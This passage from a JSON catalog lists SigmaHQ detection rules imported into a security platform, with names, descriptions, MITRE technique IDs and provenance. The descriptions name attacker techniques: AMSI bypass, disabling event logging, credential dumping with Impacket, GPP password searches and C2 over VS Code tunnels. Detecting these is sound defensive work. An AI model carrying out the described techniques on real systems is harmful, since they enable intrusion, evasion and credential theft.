Windows system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-msi-download-via-devinit-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90d50722-0483-4065-8e35-57efaadd354d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml" } }, { "id": "sigmahq-sigma-90d6bd71-dffb-4989-8d86-a827fedd6624", "type": "detection", "name": "Visual Studio Code Tunnel Execution", "description": "Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-code-tunnel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90d6bd71-dffb-4989-8d86-a827fedd6624", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml" } }, { "id": "sigmahq-sigma-90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "type": "detection", "name": "Suspicious ZipExec Execution", "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-zipexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml" } }, { "id": "sigmahq-sigma-90f138c1-f578-4ac3-8c49-eecfd847c8b7", "type": "detection", "name": "BITS Transfer Job Download From Direct IP", "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-download-from-direct-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml" } }, { "id": "sigmahq-sigma-90f342e1-1aaa-4e43-b092-39fda57ed11e", "type": "detection", "name": "ETW Logging Disabled For rpcrt4.dll", "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-disabled-for-rpcrt4-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml" } }, { "id": "sigmahq-sigma-90fb5e62-ca1f-4e22-b42e-cc521874c938", "type": "detection", "name": "Suspicious Shells Spawn by Java Utility Keytool", "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-shells-spawn-by-java-utility-keytool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_keytool_susp_child_process.yml" } }, { "id": "sigmahq-sigma-910ab938-668b-401b-b08c-b596e80fdca5", "type": "detection", "name": "Transferring Files with Credential Data via Network Shares", "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.001", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/transferring-files-with-credential-data-via-network-shares.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "910ab938-668b-401b-b08c-b596e80fdca5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" } }, { "id": "sigmahq-sigma-91109523-17f0-4248-a800-f81d9e7c081d", "type": "detection", "name": "PowerShell WMI Win32_Product Install MSI", "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-wmi-win32-product-install-msi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91109523-17f0-4248-a800-f81d9e7c081d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" } }, { "id": "sigmahq-sigma-91174a41-dc8f-401b-be89-7bfc140612a0", "type": "detection", "name": "Office Macro File Creation", "description": "Detects the creation of a new office macro files on the systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-macro-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91174a41-dc8f-401b-be89-7bfc140612a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_macro_files_created.yml" } }, { "id": "sigmahq-sigma-91239011-fe3c-4b54-9f24-15c86bb65913", "type": "detection", "name": "Office Macros Warning Disabled", "description": "Detects registry changes to Microsoft Office \"VBAWarning\" to a value of \"1\" which enables the execution of all macros, whether signed or unsigned.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-macros-warning-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91239011-fe3c-4b54-9f24-15c86bb65913", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml" } }, { "id": "sigmahq-sigma-91903aba-1088-42ee-b680-d6d94fe002b0", "type": "detection", "name": "Windows Defender Submit Sample Feature Disabled", "description": "Detects disabling of the \"Automatic Sample Submission\" feature of Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-submit-sample-feature-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91903aba-1088-42ee-b680-d6d94fe002b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml" } }, { "id": "sigmahq-sigma-919f2ef0-be2d-4a7a-b635-eb2b41fde044", "type": "detection", "name": "Disable Security Events Logging Adding Reg Key MiniNt", "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stop writing events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-security-events-logging-adding-reg-key-minint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" } }, { "id": "sigmahq-sigma-91a2c315-9ee6-4052-a853-6f6a8238f90d", "type": "detection", "name": "Findstr GPP Passwords", "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/findstr-gpp-passwords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" } }, { "id": "sigmahq-sigma-91b76b84-8589-47aa-9605-c837583b82a9", "type": "detection", "name": "Potential Okta Password in AlternateID Field", "description": "Detects when a user has potentially entered their password into the\nusername field, which will cause the password to be retained in log files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-okta-password-in-alternateid-field.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91b76b84-8589-47aa-9605-c837583b82a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_password_in_alternateid_field.yml" } }, { "id": "sigmahq-sigma-91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "type": "detection", "name": "RTCore Suspicious Service Installation", "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rtcore-suspicious-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml" } }, { "id": "sigmahq-sigma-91c945bc-2ad1-4799-a591-4d00198a1215", "type": "detection", "name": "Suspicious Access to Sensitive File Extensions", "description": "Detects known sensitive file extensions accessed on a network share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1039" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-access-to-sensitive-file-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91c945bc-2ad1-4799-a591-4d00198a1215", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" } }, { "id": "sigmahq-sigma-91c95675-1f27-46d0-bead-d1ae96b97cd3", "type": "detection", "name": "User Added To Group With CA Policy Modification Access", "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-group-with-ca-policy-modification-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91c95675-1f27-46d0-bead-d1ae96b97cd3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml" } }, { "id": "sigmahq-sigma-91e69562-2426-42ce-a647-711b8152ced6", "type": "detection", "name": "AADInternals PowerShell Cmdlets Execution - PsScript", "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aadinternals-powershell-cmdlets-execution-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91e69562-2426-42ce-a647-711b8152ced6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" } }, { "id": "sigmahq-sigma-91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "type": "detection", "name": "Weak or Abused Passwords In CLI", "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.\nAn example would be a threat actor creating a new user via the net command and providing the password inline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/weak-or-abused-passwords-in-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml" } }, { "id": "sigmahq-sigma-9212f354-7775-4e28-9c9f-8f0a4544e664", "type": "detection", "name": "Active Directory Database Snapshot Via ADExplorer", "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1069.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-database-snapshot-via-adexplorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9212f354-7775-4e28-9c9f-8f0a4544e664", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml" } }, { "id": "sigmahq-sigma-921aa10f-2e74-4cca-9498-98f9ca4d6fdf", "type": "detection", "name": "Registry Modification Attempt Via VBScript", "description": "Detects attempts to modify the registry using VBScript's CreateObject(\"Wscript.shell\") and RegWrite methods via common LOLBINs.\nIt could be an attempt to modify the registry for persistence without using straightforward methods like regedit.exe, reg.exe, or PowerShell.\nThreat Actors may use this technique to evade detection by security solutions that monitor for direct registry modifications through traditional tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-attempt-via-vbscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "921aa10f-2e74-4cca-9498-98f9ca4d6fdf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vbscript_registry_modification.yml" } }, { "id": "sigmahq-sigma-9248c7e1-2bf3-4661-a22c-600a8040b446", "type": "detection", "name": "Potential Rundll32 Execution With DLL Stored In ADS", "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rundll32-execution-with-dll-stored-in-ads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml" } }, { "id": "sigmahq-sigma-9257c05b-4a4a-48e5-a670-b7b073cf401b", "type": "detection", "name": "Binary Proxy Execution Via Dotnet-Trace.EXE", "description": "Detects commandline arguments for executing a child process via dotnet-trace.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/binary-proxy-execution-via-dotnet-trace-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9257c05b-4a4a-48e5-a670-b7b073cf401b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml" } }, { "id": "sigmahq-sigma-92626ddd-662c-49e3-ac59-f6535f12d189", "type": "detection", "name": "Scheduled Task Creation Via Schtasks.EXE", "description": "Detects the creation of scheduled tasks by user accounts via the \"schtasks\" utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-creation-via-schtasks-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92626ddd-662c-49e3-ac59-f6535f12d189", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_creation.yml" } }, { "id": "sigmahq-sigma-92772523-d9c1-4c93-9547-b0ca500baba3", "type": "detection", "name": "Potential Persistence Via Mpnotify", "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-mpnotify.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92772523-d9c1-4c93-9547-b0ca500baba3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml" } }, { "id": "sigmahq-sigma-9292293b-8496-4715-9db6-37028dcda4b3", "type": "detection", "name": "Replace.exe Usage", "description": "Detects the use of Replace.exe which can be used to replace file with another file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/replace-exe-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9292293b-8496-4715-9db6-37028dcda4b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" } }, { "id": "sigmahq-sigma-92a974db-ab84-457f-9ec0-55db83d7a825", "type": "detection", "name": "Potential AMSI Bypass Using NULL Bits", "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amsi-bypass-using-null-bits.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92a974db-ab84-457f-9ec0-55db83d7a825", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml" } }, { "id": "sigmahq-sigma-92cc3e5d-eb57-419d-8c16-5c63f325a401", "type": "detection", "name": "Azure Suppression Rule Created", "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-suppression-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92cc3e5d-eb57-419d-8c16-5c63f325a401", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml" } }, { "id": "sigmahq-sigma-92dae1ed-1c9d-4eff-a567-33acbd95b00e", "type": "detection", "name": "Possible Impacket SecretDump Remote Activity - Zeek", "description": "Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.004", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-impacket-secretdump-remote-activity-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" } }, { "id": "sigmahq-sigma-92f84194-8d9a-4ee0-8699-c30bfac59780", "type": "detection", "name": "AWS Key Pair Import Activity", "description": "Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-key-pair-import-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92f84194-8d9a-4ee0-8699-c30bfac59780", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ec2_import_key_pair_activity.yml" } }, { "id": "sigmahq-sigma-92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "type": "detection", "name": "Potential Startup Shortcut Persistence Via PowerShell.EXE", "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-startup-shortcut-persistence-via-powershell-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 